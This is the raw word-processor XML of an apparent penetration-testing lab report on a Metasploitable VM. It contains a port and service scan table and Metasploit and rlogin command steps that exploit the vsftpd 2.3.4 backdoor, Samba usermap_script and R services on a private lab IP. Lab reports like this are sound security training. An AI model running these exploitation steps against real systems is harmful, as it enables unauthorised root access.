        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35DE791E" w14:textId="1FD3267D" w:rsidR="0062108E" w:rsidRDefault="00091482" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">open </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00577D2A">
              <w:t>bindshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D94426" w14:textId="0E6C54E4" w:rsidR="0062108E" w:rsidRDefault="00630401" w:rsidP="00A471BB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062108E" w14:paraId="7D8E3A29" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25F444F4" w14:textId="453B9777" w:rsidR="0062108E" w:rsidRDefault="002F7B15" w:rsidP="00A471BB">
            <w:r>
              <w:t>2049/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00246DD8">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27061BEF" w14:textId="17DEC391" w:rsidR="0062108E" w:rsidRDefault="00091482" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">open </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008075D2">
              <w:t>nfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="306A6AC1" w14:textId="40334A39" w:rsidR="0062108E" w:rsidRDefault="00630401" w:rsidP="00A471BB">
            <w:r>
              <w:t>2-4(RPC#100003)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C5632C" w14:paraId="298C1692" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75556D01" w14:textId="0E46E449" w:rsidR="00C5632C" w:rsidRDefault="00C5632C" w:rsidP="00A471BB">
            <w:r>
              <w:t>2121/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6943AB1C" w14:textId="1C7A5DAF" w:rsidR="00C5632C" w:rsidRDefault="00C5632C" w:rsidP="00A471BB">
            <w:r>
              <w:t>open ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="640832A7" w14:textId="02CCE09A" w:rsidR="00C5632C" w:rsidRDefault="00C5632C" w:rsidP="00A471BB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ProFTPD</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 1.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D1374" w14:paraId="4186E8B1" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="504AA33D" w14:textId="02F5B475" w:rsidR="003D1374" w:rsidRDefault="003D1374" w:rsidP="00A471BB">
            <w:r>
              <w:t>3306/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5A653B4B" w14:textId="357D35FF" w:rsidR="003D1374" w:rsidRDefault="003D1374" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">open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14:paraId="78A087CE" w14:textId="623350E5" w:rsidR="003D1374" w:rsidRDefault="003D1374" w:rsidP="00A471BB">
            <w:r>
              <w:t>MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062108E" w14:paraId="32815DF8" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29E09280" w14:textId="4EBB0CB1" w:rsidR="0062108E" w:rsidRDefault="00015B78" w:rsidP="00A471BB">
            <w:r>
              <w:t>5432/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00246DD8">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2760FB30" w14:textId="3382DD1E" w:rsidR="0062108E" w:rsidRDefault="00091482" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">open </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008075D2">
              <w:t>postgres</w:t>
            </w:r>
            <w:r w:rsidR="008B131B">
              <w:t>ql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E912D3D" w14:textId="5AD74075" w:rsidR="0062108E" w:rsidRDefault="003D1374" w:rsidP="00A471BB">
            <w:r>
              <w:t>PostgreSQL DB 8.3.0-8.3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB3C03" w14:paraId="30637275" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E5B9317" w14:textId="241B7C13" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>5900/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0A26AE2E" w14:textId="67FE684D" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">open </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vnc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F4BF81" w14:textId="18690B9B" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>VNC ( protocol 3.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB3C03" w14:paraId="78D55070" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55BEDDDB" w14:textId="05F46FB1" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>6000/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1651EC88" w14:textId="2CC82F61" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>open X11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FEBEC4E" w14:textId="58740229" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>( access denied)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB3C03" w14:paraId="5E0C2700" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D67BDA5" w14:textId="039BB349" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>6667/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5FE324BA" w14:textId="73197E76" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">open </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>irc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2804DFD8" w14:textId="13D1D3B9" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>UnreallRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB3C03" w14:paraId="0BB086CD" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0645BD6B" w14:textId="02EFACD5" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>8009/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3C806293" w14:textId="73D59003" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>open ajp13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24527DCA" w14:textId="66369ABE" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">Apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Jserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ( Protocol v1.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB3C03" w14:paraId="5E900F1E" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4115837A" w14:textId="00C98973" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>8180/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7161AA19" w14:textId="70071FC2" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">open http </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AC7658F" w14:textId="4DB63E63" w:rsidR="00DB3C03" w:rsidRDefault="00DB3C03" w:rsidP="00A471BB">
            <w:r>
              <w:t>Apache Tomcat/Coyote JSP engine 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74044F8E" w14:textId="77777777" w:rsidR="00941FD0" w:rsidRDefault="00941FD0" w:rsidP="00941FD0"/>
    <w:p w14:paraId="44A9FFDF" w14:textId="77777777" w:rsidR="00941FD0" w:rsidRDefault="00941FD0" w:rsidP="00941FD0"/>
    <w:p w14:paraId="0154D7D7" w14:textId="77777777" w:rsidR="00D40A85" w:rsidRPr="00D40A85" w:rsidRDefault="00D40A85" w:rsidP="00D40A85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40A85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hidden Ports with Service Versions (ONLY HIDDEN PORTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE90F93" w14:textId="77777777" w:rsidR="00D40A85" w:rsidRDefault="00D40A85" w:rsidP="00D40A85">
      <w:r>
        <w:t>1. 8787/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Ruby </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DRb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RMI (Ruby 1.8; path /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/ruby/1.8/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E074449" w14:textId="77777777" w:rsidR="00D40A85" w:rsidRDefault="00D40A85" w:rsidP="00D40A85">
      <w:r>
        <w:t>2. 3632/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>distccd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>distccd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D3673E" w14:textId="77777777" w:rsidR="00D40A85" w:rsidRDefault="00D40A85" w:rsidP="00D40A85">
      <w:r>
        <w:t>3. 6697/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="442C9907" w14:textId="77777777" w:rsidR="00D40A85" w:rsidRDefault="00D40A85" w:rsidP="00D40A85">
      <w:r>
        <w:t>4. 35851/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mountd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1-3 (RPC #100005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF783C5" w14:textId="77777777" w:rsidR="00D40A85" w:rsidRDefault="00D40A85" w:rsidP="00D40A85">
      <w:r>
        <w:t>5. 36571/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nlockmgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1-4 (RPC #100021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8721CB" w14:textId="77777777" w:rsidR="00D40A85" w:rsidRDefault="00D40A85" w:rsidP="00D40A85">
      <w:r>
        <w:t>6. 44585/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open java-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> GNU </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Classpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grmiregistry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A281A93" w14:textId="77777777" w:rsidR="00D40A85" w:rsidRDefault="00D40A85" w:rsidP="00D40A85">
      <w:r>
        <w:t>7. 51228/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open status 1 (RPC #100024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC47F61" w14:textId="77777777" w:rsidR="0035001D" w:rsidRDefault="0035001D" w:rsidP="00D40A85"/>
    <w:p w14:paraId="78162E06" w14:textId="1869AB28" w:rsidR="00765B47" w:rsidRDefault="0035001D" w:rsidP="00941FD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035001D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 4- Exploitation of services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3C47F6" w14:textId="77777777" w:rsidR="00693371" w:rsidRPr="00693371" w:rsidRDefault="00693371" w:rsidP="00693371">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693371">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00693371">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00693371">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 (Port 21 - FTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A154BA" w14:textId="09566D31" w:rsidR="00693371" w:rsidRPr="009A2AA1" w:rsidRDefault="00693371" w:rsidP="00515192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2AA1">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="463C2B6D" w14:textId="1A082768" w:rsidR="00693371" w:rsidRPr="009A2AA1" w:rsidRDefault="00693371" w:rsidP="004234B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2AA1">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A2AA1">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A2AA1">
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5AD5DC" w14:textId="12981782" w:rsidR="00693371" w:rsidRPr="009A2AA1" w:rsidRDefault="00693371" w:rsidP="004234B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2AA1">
        <w:t>set RHOST 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659FAA38" w14:textId="2D457275" w:rsidR="00693371" w:rsidRDefault="00693371" w:rsidP="004234B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2AA1">
        <w:t>set RPORT 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3709FA4A" w14:textId="0FEA27DE" w:rsidR="00E72536" w:rsidRDefault="00E72536" w:rsidP="004234B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00217385">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25082A52" wp14:editId="454C47E2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4904740" cy="2013585"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="15053597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59724" name="Picture 15053597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4D194" w14:textId="77777777" w:rsidR="00382A42" w:rsidRPr="008C6617" w:rsidRDefault="00382A42" w:rsidP="008C6617">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C6617">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. SMB 3.0.20-Debian (Port 443)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F8E4E0" w14:textId="4C0A3EAE" w:rsidR="00382A42" w:rsidRDefault="00382A42" w:rsidP="00382A42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72710B23" w14:textId="4DEF8C2B" w:rsidR="00382A42" w:rsidRDefault="00382A42" w:rsidP="00382A42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75C52C88" w14:textId="7497225C" w:rsidR="00382A42" w:rsidRDefault="00382A42" w:rsidP="00382A42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="284A5020" w14:textId="035779FD" w:rsidR="00382A42" w:rsidRDefault="00382A42" w:rsidP="008C6617">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075C49C6" w14:textId="40136EB4" w:rsidR="00E72536" w:rsidRDefault="00382A42" w:rsidP="00382A42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set RHOST 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE91EF7" w14:textId="40EB46FA" w:rsidR="0042163A" w:rsidRDefault="00CD51DF" w:rsidP="00382A4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8607E4C" wp14:editId="259530FF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-791210</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>664210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7315200" cy="6583680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1496127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2734" name="Picture 1496127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63A">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539914F3" w14:textId="77777777" w:rsidR="00373871" w:rsidRDefault="00373871" w:rsidP="00373871"/>
    <w:p w14:paraId="3F563920" w14:textId="2C970164" w:rsidR="00031A72" w:rsidRPr="0067588D" w:rsidRDefault="00031A72" w:rsidP="00CD51DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F530E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting R Services (Port 512,513,514)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC74223" w14:textId="35577B09" w:rsidR="00031A72" w:rsidRDefault="00031A72" w:rsidP="00CD51DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p 512,513,514 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC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–script=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49413C10" w14:textId="07988E5D" w:rsidR="00031A72" w:rsidRPr="009A2AA1" w:rsidRDefault="00031A72" w:rsidP="00F530E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>rlogin -l root 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617519D2" w14:textId="71EA1F6B" w:rsidR="00CD51DF" w:rsidRDefault="00655039" w:rsidP="00CD51DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DC452BE" wp14:editId="040AC065">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>62865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>278765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3354705"/>
